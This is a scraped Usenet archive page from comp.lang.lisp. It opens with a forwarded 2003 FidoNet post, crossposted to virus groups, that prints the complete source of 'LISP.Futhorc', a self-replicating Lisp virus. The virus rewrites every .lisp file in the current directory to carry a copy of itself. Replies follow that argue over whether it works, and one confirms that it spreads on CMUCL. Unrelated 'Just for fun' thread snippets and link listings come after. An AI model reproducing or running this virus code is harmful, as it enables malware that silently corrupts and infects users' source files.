[Fwd] Just for fun

-------------------- Start of forwarded message --------------------
Newsgroups: fido7.xsu.hacker
From: "Ilya V. Vasilyev" (2:5020/287)
Date: Thu, 26 Jun 2003 10:27:28 +0600
Subject: Just for fun

* Forwarded by Ilya V. Vasilyev (2:5020/287)
* Area : su.cm (su.cm)
* From : andrew baranovich, 2:465/215 (Wednesday June 25 2003 15:21)
* To   : All
* Subj : Just for fun
* Originally in su.cm
Crossposted to pvt.virii
Crossposted to ru.virus

;; Virus LISP.Futhorc by herm1t(at)netlux.org / Jun'03
(setq virus '(defun infect (&optional (ls (directory "*.lisp")))
  (defun writel (l s) (when l (write-line (car l) s) (writel (cdr l) s)))
  (when (setq vic (car ls))
    (let ((p nil)) (with-open-file (i vic :direction :input)
      (unless (equal (second (read i)) 'VIRUS) (file-position i 0)
        (loop (unless (setq line (read-line i nil nil)) (return))
          (setq p (append p (list line))))))
      (when p (with-open-file (o vic :direction :output)
        (format o "(setq virus '~S~%)(eval virus)(infect)~%" virus)
 (writel p o))))
    (infect (cdr ls))))
)(eval virus)(infect)

--
herm1t http://vx.netlux.org/ HERM-RIPE UR6IUF 2:465/215

-+- golded 3.0.1
 + Origin: Feed my fear (2:465/215)

-------------------- End of forwarded message --------------------

--
Ivan Boldyrev

                                                        ���� ����� ����!
0
nospam5292 (249)
6/27/2003 6:32:13 AM
comp.lang.lisp 16710 articles. 2 followers. Post Follow

In article <u65mrus6p.fsf@dtpq.com>,
Christopher C. Stacy <cstacy@dtpq.com> wrote:
>This program is a lot of gibberish and does not do anything at all:
>most of it is never even executed.

Sure it is.

As written, it doesn't do anything other than append itself to all the
*.lisp files in the current directory; if any of them are later loaded (or
compiled and the resulting binary loaded) they'll do the same.  It's a
simple virus propagation wrapper; it's a simple matter to modify it to do
something (harmful or not) in addition to propagating itself.

--
Barry Margolin, barry.margolin@level3.com
Level(3), Woburn, MA
cstacy@dtpq.com (Christopher C. Stacy) writes:

> This program is a lot of gibberish and does not do anything at all:
> most of it is never even executed.

It spreads nicely on CMUCL, albeit with warnings about undefined
variables.  Didn't you notice the EVAL call near the end?

The (second (read i)) call can have consequences not expected by
the author.
0
kon (429)
6/27/2003 10:07:21 PM

 Barry> In article <u65mrus6p.fsf@dtpq.com>,
 Barry> Christopher C. Stacy <cstacy@dtpq.com> wrote:
 >> This program is a lot of gibberish and does not do anything at all:
 >> most of it is never even executed.

 Barry> Sure it is.

I think I made a typographical error when pasting it into an
editor buffer and reformatting it so that I could actually read it.
My version of it had it setting the variable VIRUS to the source code
of a function called INFECT that took one optional arg but had no body.

0
cstacy (118)
6/28/2003 3:15:21 AM
On 8423 day of my life Christopher C. Stacy wrote:

> I would be circumspect in writing programs called "Virus" and posting
> them on the net in so-called "hacker" newsgroups,

This is NG of "hackers" in sense of Eric Raymond.

> even if it is supposed to be (I assume) some kind of joke.  It looks
> like you are not the original author of the "virus" program, but can
> you understand what you have posted?

I am smart enough.  May be, I am even Turing-complete :)))

> It's as if someone has cut-and-pasted fragments of Lisp code from
> other programs, without understanding what they were copying.

I do understand code before copying.

> This program is a lot of gibberish and does not do anything at all:
> most of it is never even executed.

Be more attentive: the virus is in your brain now :)

--
Ivan Boldyrev

                                Onions has layers.  Unix has layers too.
0
nospam5292 (249)
6/28/2003 8:06:53 PM
On Sun, Jun 29, 2003 at 03:06:53AM +0700, Ivan Boldyrev wrote:
> Be more attentive: the virus is in your brain now :)

Actually, he's right even though he didn't mean it.  I'll give you a
hint: the program invokes undefined behavior.

--
; Matthew Danish <mdanish@andrew.cmu.edu>
; Signed or encrypted mail welcome.

Just for fun...
Here is a piece of document from a DICOM conformance statement from a well known big company (*). I guess we need a CP which explains that VR=UN in a CS document is of no use :) -Mathieu (*) B.1 3D IMAGE MEDIA PRIVATE TAG DESCRIPTION The private tags listed in this section are intended for internal use within the iU22 enabling continued analysis of iU22 3D datasets imported from media. Tag VR Value (2001,00FF) LO Philips Imaging DD 001 (2001,FF6E) UN Series (200D,00FE) LO Philips US Imaging DD 017 (200D,00FD) LO ...

Just for fun...
I posted this to another forum as part of a challenge... thought to post it here just for fun. +5 pts if you know what algorithm is being used here... Anyone care to golf? Note that the breakdown of the string TXT was just to prevent it from line-wrapping... TXT = ".,~,,;\ntee,yeeewgeendhoeheddrhdfteeenn" + "\n\n\n\n\nr cl u enneiii ddd hhhlhhhh" + "elllphsvHfo ousctTTttTttgdfddwl tddd " + "uaooAat doopmp cmsse o i ari t isa" + "joo e\n" dat = [""] * TXT.size TXT.size.times do dat = TXT.split(...

Just for fun
While I am compileing kernel -2.6.15.2 and fixing errrors in ~src/linux-2.6.15.2/drivers/scsi/ipr.c , I was watching xosview, then I wondered how I could grap the (ever changing) X window of xosview and embed it in my site. So I one see the OS working from everywhere. When you go to any site thse days they have live animations..... commercials. Is there already some application to dynamically show an X window via apache? Or if not what would be the best way (preferably not java...) maybe php? How do these commercials do it? In article <ds0iim$ut4$1@news.datemas.de>, Ja...

just for fun
hello everone,my name is phelim. ...

Just for fun
Hi, Recently I've been playing on C programming avoiding libc and also assembly. Well, I guess some of us like to mess up with things like: #include <linux/types.h> #include <linux/unistd.h> int errno; _syscall1(int, exit, int, status) _syscall3(ssize_t, write, int, fd, const void *, buf, size_t, count) void _start() { write(1, "Hello there\n", 12); exit(0); } And then compiling with "-nostdlib". In case argc, argv and/or envp are needed we have to get it from the stack (AFAIK). Thats the work for /usr/lib/crt1.o in glibc. Of course, we al...

Just for fun?
Hi all An interesting question: Does anyone know if the PSP (Playstation Portable) would work under USB with RISC OS? I have a PSP, but I cannot check the USB connectivity since I don't have USB for my RISC PC, and am not likely to get it, since it is just too expensive... And I know you can use the memory stick of the PSP with a card reader, but connecting the PSP itself to a RISC PC or Iyonix is just soo much cooler! Cheers! Samuel -- Samuel Kock http://skock.blogspot.com In article <dtkjfm$jhq$1@ctb-nnrp2.saix.net>, Samuel Kock <samuelk@absamail.xhosa> wrote: >...

Just For the Fun of It
I tried doing an install of OpenVMS 7.3 again - just to clear my mind up on what was involved. Well, I've proved at least one thing - even _I_ can install VMS, even when for some reason, I'm all thumbs with two left feet. :-) make that sys$all_thumbs: 2left_feet Now comes the difficult thing - cooling down enough to remember how I used edit last time I did this. ;) I should thank DEC for such a challenging experience! ;^) What's life without a challenge? Wesley Parish -- "Good, late in to more rewarding well."  "Well, you tonight. ...

Just Fun
http://kg-azfari.myminicity.com/tra Look and see ...

Just for fun.
What is matlab's favorite vegetable? "Paul Alexander" <psalexander@alaska.edu> wrote in message <ieougi$j3v$1@fred.mathworks.com>... > What is matlab's favorite vegetable? doc why "Paul Alexander" <psalexander@alaska.edu> wrote in message <ieougi$j3v$1@fred.mathworks.com>... > What is matlab's favorite vegetable? Celery? (cell-array) Dear Paul, > What is matlab's favorite vegetable? Ok, we solve this typical homework question for you - as an exception. 1. Have you read the Getting Started section of th...

To LISP or not to LISP?
I know there have always been tons of posts on game AI boards asking about LISP, what it is, and if it's used in commercial games. Given that LISP is used in few commercial games, is it worth becoming fluent in anyway? I am considering persuing it for two reasons: A.) It is used in academic papers. Being fluent in LISP allows a person to stay on top of the latest developments in AI. B.) It can be embedded into game engines. I heard that Halo uses an embedded LISP-like language for AI. Could embedded LISP-style languages benificial in the long run? I've been reading ...

More fun with Lisp
This evening I found an interesting exercise from Dave Thomas (author of The Pragmatic Programmer), and solved it in Common Lisp. It was a lot of fun - I thought some of you might like to see it: http://www.abstractnonsense.com/chop.html Cheers, Bill. -- "If you give someone Fortran, he has Fortran. If you give someone Lisp, he has any language he pleases." -- Guy Steele William Bland wrote: > This evening I found an interesting exercise from Dave Thomas (author of > The Pragmatic Programmer), and solved it in Common Lisp. It was a lot of > fun - I thought some of ...

Just for fun
Hi, Recently I've been playing on C programming avoiding libc and also assembly. Well, I guess some of us like to mess up with things like: #include <linux/types.h> #include <linux/unistd.h> int errno; _syscall1(int, exit, int, status) _syscall3(ssize_t, write, int, fd, const void *, buf, size_t, count) void _start() { write(1, "Hello there\n", 12); exit(0); } And then compiling with "-nostdlib". In case argc, argv and/or envp are needed we have to get it from the stack (AFAIK). Thats the work for /usr/lib/crt1.o in glibc. Of course, we al...

Lisp web browser not using hard disk, and javascript free, just have lisp
Has anyone though about this? Get rida shitty java script with lisp web browser? Avoid disk to have speed, all running on lisp interpreter at base of the browser? On 10/29/2011 4:09 AM, gavino wrote: > Has anyone though about this? > > Get rida shitty java script with lisp web browser? I am fighting javascript as I write this :( So, yes. It's a question about who's going to bell the cat (not me) > > Avoid disk to have speed, you can do that today, it's called iPhone -Antony no, on free software, without google garbage or java script.. This is the tragedy of the ...

Greenspun on tcl vs lisp, is it less work to just do tcl? will lisp have longterm advantage?
http://philip.greenspun.com/tcl/introduction.adp toward the bottom In the case of AOLserver, for example, Jim Davidson and Doug McKee had only a few months to build the whole server from scratch. They wanted users to be able to write small programs that ran inside the server process. They therefore needed a safe interpreted language so that a programming error by one user didn't crash the server and bring down all the Web services for an organization. Tcl was available. Tcl was easy to download and designed to fit inside larger application programs. But the Tcl interpreter as distributed ...

Web resources about - [Fwd] Just for fun - comp.lang.lisp

FWD.us - Wikipedia, the free encyclopedia
FWD.us is a 501(c)(4) lobbying group based in the United States that aims to lobby and advocate for its version of immigration reform , changes ...

FWD Thinking
Thoughts on public relations, social media and trendspotting from the M Booth Digisquad

Elon Musk, David Sacks Withdraw From Mark Zuckerberg-Led FWD.us
FWD.us , the political advocacy group spearheaded by Facebook Co-Founder and CEO Mark Zuckerberg , suffered two defections over the weekend: ...

Jose Antonio Vargas salutes Zuckerberg, FWD.us for immigration-reform efforts
... mediabistro , which will run next week, Vargas expressed his gratitude over having Facebook Co-Founder and CEO Mark Zuckerberg and his FWD.us ...

FWD.us (@FWD_us) on Twitter
Sign in Sign up You are on Twitter Mobile because you are using an old version of Internet Explorer. Learn more here FWD.us @ FWD_us Moving the ...

She says he says: CX-9 FWD Classic (05:04)
Stephen Ottley and Sally Dominguez discuss the family friendly SUV.

Toyota Kluger KX-R FWD
How much? From $39,990 Engine: 3.5-litre V6. 201kW/337Nm Fuel use/emissions: 11.0L/100km and 259g CO2/km Safety: Five-star rating. Seven ...

She says he says: CX-9 FWD Classic (05:04)
Stephen Ottley and Sally Dominguez discuss the family friendly SUV.

FWD.US Highlights Hope Brought by New Arrivals
With the Immigration Reform bill due to be debated in the US Senate shortly, SS+K created this uplifting spot by FWD.us, the foundation started ...